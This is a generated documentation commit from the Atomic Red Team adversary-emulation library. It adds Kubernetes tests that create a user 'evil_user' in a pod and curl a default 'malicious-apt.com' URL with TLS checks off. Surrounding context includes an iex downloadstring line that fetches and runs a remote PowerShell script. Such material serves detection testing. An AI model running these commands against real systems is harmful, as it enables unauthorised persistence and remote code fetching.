Generated docs from job=generate-docs branch=master [ci skip]

2025-10-06 15:55:53 +00:00
parent 1a197af893
commit e2115e52c0
14 changed files with 254 additions and 7 deletions
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1744-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1746-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)


 Atomic Red Team™ is a library of tests mapped to the
@@ -1 +1 @@
-{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
+{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1105","score":1,"enabled":true,"comment":"\n- Curl Insecure Connection from a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a Linux user via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
@@ -6,6 +6,7 @@ credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-
 credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
+persistence,T1136.001,Create Account: Local Account,10,Create a Linux user via kubectl in a Pod,d9efa6c7-6518-42b2-809a-4f2a8e242b9b,bash
 privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
@@ -1289,6 +1289,7 @@ persistence,T1136.001,Create Account: Local Account,6,Create a new user in Linux
 persistence,T1136.001,Create Account: Local Account,7,Create a new user in FreeBSD with `root` GID.,d141afeb-d2bc-4934-8dd5-b7dba0f9f67a,sh
 persistence,T1136.001,Create Account: Local Account,8,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
 persistence,T1136.001,Create Account: Local Account,9,Create a new Windows admin user via .NET,2170d9b5-bacd-4819-a952-da76dae0815f,powershell
+persistence,T1136.001,Create Account: Local Account,10,Create a Linux user via kubectl in a Pod,d9efa6c7-6518-42b2-809a-4f2a8e242b9b,bash
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
@@ -1526,6 +1527,7 @@ command-and-control,T1105,Ingress Tool Transfer,35,Windows pull file using scp.e
 command-and-control,T1105,Ingress Tool Transfer,36,Windows push file using sftp.exe,205e676e-0401-4bae-83a5-94b8c5daeb22,powershell
 command-and-control,T1105,Ingress Tool Transfer,37,Windows pull file using sftp.exe,3d25f1f2-55cb-4a41-a523-d17ad4cfba19,powershell
 command-and-control,T1105,Ingress Tool Transfer,38,Download a file with OneDrive Standalone Updater,3dd6a6cf-9c78-462c-bd75-e9b54fc8925b,powershell
+command-and-control,T1105,Ingress Tool Transfer,39,Curl Insecure Connection from a Pod,7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3,bash
 command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,3,Execute Embedded Script in Image via Steganography,4ff61684-ad91-405c-9fbc-048354ff1d07,sh
@@ -308,7 +308,8 @@
 - T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.001 Create Account: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
+  - Atomic Test #10: Create a Linux user via kubectl in a Pod [containers]
 - T1176.002 IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -401,7 +402,8 @@
 - T1219.002 Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.001 Application Layer Protocol: Web Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1105 Ingress Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
+  - Atomic Test #39: Curl Insecure Connection from a Pod [containers]
 - T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1001.002 Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1708,6 +1708,7 @@
  - Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux]
  - Atomic Test #8: Create a new Windows admin user [windows]
  - Atomic Test #9: Create a new Windows admin user via .NET [windows]
+  - Atomic Test #10: Create a Linux user via kubectl in a Pod [containers]
 - T1176.002 IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
  - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
@@ -2061,6 +2062,7 @@
  - Atomic Test #36: Windows push file using sftp.exe [windows]
  - Atomic Test #37: Windows pull file using sftp.exe [windows]
  - Atomic Test #38: Download a file with OneDrive Standalone Updater [windows]
+  - Atomic Test #39: Curl Insecure Connection from a Pod [containers]
 - T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
  - Atomic Test #1: Steganographic Tarball Embedding [windows]
@@ -31868,7 +31868,42 @@ persistence:
      - 'Process: Process Creation'
      - 'Command: Command Execution'
      identifier: T1136.001
-    atomic_tests: []
+    atomic_tests:
+    - name: Create a Linux user via kubectl in a Pod
+      auto_generated_guid: d9efa6c7-6518-42b2-809a-4f2a8e242b9b
+      description: |
+        Launches a short-lived Alpine pod and creates a Linux user inside the pod.
+        The pod is automatically deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        pod_name:
+          description: K8s pod_name to execute the command in
+          type: string
+          default: atomic-linux-useradd
+        username:
+          description: Username of the user to create inside the pod
+          type: string
+          default: evil_user
+        image_name:
+          description: Name of the docker image
+          type: string
+          default: alpine
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm
+          -it -- sh -lc ''adduser -D #{username} && id #{username}''
+
+          '
  T1176.002:
    technique:
      type: attack-pattern
@@ -40196,7 +40231,40 @@ command-and-control:
      - 'Command: Command Execution'
      - 'Network Traffic: Network Connection Creation'
      identifier: T1105
-    atomic_tests: []
+    atomic_tests:
+    - name: Curl Insecure Connection from a Pod
+      auto_generated_guid: 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
+      description: |
+        Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
+        against a target URL. The pod is automatically deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        pod_name:
+          description: K8s pod_name to execute the command in
+          type: string
+          default: atomic-insecure-curl
+        remote_url:
+          description: Remote URL to curl
+          type: string
+          default: https://malicious-apt.com
+        image_name:
+          description: Name of the docker image
+          type: string
+          default: curlimages/curl
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm
+          -it -- curl -ksL #{remote_url}'
  T1665:
    technique:
      type: attack-pattern
@@ -67517,6 +67517,41 @@ persistence:
        command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
        name: powershell
        elevation_required: true
+    - name: Create a Linux user via kubectl in a Pod
+      auto_generated_guid: d9efa6c7-6518-42b2-809a-4f2a8e242b9b
+      description: |
+        Launches a short-lived Alpine pod and creates a Linux user inside the pod.
+        The pod is automatically deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        pod_name:
+          description: K8s pod_name to execute the command in
+          type: string
+          default: atomic-linux-useradd
+        username:
+          description: Username of the user to create inside the pod
+          type: string
+          default: evil_user
+        image_name:
+          description: Name of the docker image
+          type: string
+          default: alpine
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm
+          -it -- sh -lc ''adduser -D #{username} && id #{username}''
+
+          '
  T1176.002:
    technique:
      type: attack-pattern
@@ -83906,6 +83941,39 @@ command-and-control:
          Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore
        name: powershell
        elevation_required: false
+    - name: Curl Insecure Connection from a Pod
+      auto_generated_guid: 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
+      description: |
+        Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
+        against a target URL. The pod is automatically deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        pod_name:
+          description: K8s pod_name to execute the command in
+          type: string
+          default: atomic-insecure-curl
+        remote_url:
+          description: Remote URL to curl
+          type: string
+          default: https://malicious-apt.com
+        image_name:
+          description: Name of the docker image
+          type: string
+          default: curlimages/curl
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm
+          -it -- curl -ksL #{remote_url}'
  T1665:
    technique:
      type: attack-pattern
@@ -90,6 +90,8 @@ Files can also be transferred using various [Web Service](https://attack.mitre.o

 - [Atomic Test #38 - Download a file with OneDrive Standalone Updater](#atomic-test-38---download-a-file-with-onedrive-standalone-updater)

+- [Atomic Test #39 - Curl Insecure Connection from a Pod](#atomic-test-39---curl-insecure-connection-from-a-pod)
+

 <br/>

@@ -1950,4 +1952,52 @@ Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Please



+<br/>
+<br/>
+
+## Atomic Test #39 - Curl Insecure Connection from a Pod
+Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
+against a target URL. The pod is automatically deleted after execution.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| pod_name | K8s pod_name to execute the command in | string | atomic-insecure-curl|
+| remote_url | Remote URL to curl | string | https://malicious-apt.com|
+| image_name | Name of the docker image | string | curlimages/curl|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: kubectl must be installed and configured
+##### Check Prereq Commands:
+```bash
+which kubectl
+```
+##### Get Prereq Commands:
+```bash
+echo "kubectl must be installed manually"
+```
+
+
+
+
 <br/>
@@ -1270,6 +1270,7 @@ atomic_tests:
    name: powershell
    elevation_required: false
 - name: Curl Insecure Connection from a Pod
+  auto_generated_guid: 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
  description: |
    Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
    against a target URL. The pod is automatically deleted after execution.
@@ -30,6 +30,8 @@ Such accounts may be used to establish secondary credentialed access that do not

 - [Atomic Test #9 - Create a new Windows admin user via .NET](#atomic-test-9---create-a-new-windows-admin-user-via-net)

+- [Atomic Test #10 - Create a Linux user via kubectl in a Pod](#atomic-test-10---create-a-linux-user-via-kubectl-in-a-pod)
+

 <br/>

@@ -369,4 +371,52 @@ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/



+<br/>
+<br/>
+
+## Atomic Test #10 - Create a Linux user via kubectl in a Pod
+Launches a short-lived Alpine pod and creates a Linux user inside the pod.
+The pod is automatically deleted after execution.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** d9efa6c7-6518-42b2-809a-4f2a8e242b9b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| pod_name | K8s pod_name to execute the command in | string | atomic-linux-useradd|
+| username | Username of the user to create inside the pod | string | evil_user|
+| image_name | Name of the docker image | string | alpine|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: kubectl must be installed and configured
+##### Check Prereq Commands:
+```bash
+which kubectl
+```
+##### Get Prereq Commands:
+```bash
+echo "kubectl must be installed manually"
+```
+
+
+
+
 <br/>
@@ -186,6 +186,7 @@ atomic_tests:
    name: powershell
    elevation_required: true
 - name: Create a Linux user via kubectl in a Pod
+  auto_generated_guid: d9efa6c7-6518-42b2-809a-4f2a8e242b9b
  description: |
    Launches a short-lived Alpine pod and creates a Linux user inside the pod.
    The pod is automatically deleted after execution.
@@ -1767,3 +1767,5 @@ d2a1f4bc-a064-4223-8281-a086dce5423c
 cbb2573a-a6ad-4c87-aef8-6e175598559b
 ac333fe1-ce2b-400b-a117-538634427439
 6e76f56f-2373-4a6c-a63f-98b7b72761f1
+d9efa6c7-6518-42b2-809a-4f2a8e242b9b
+7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3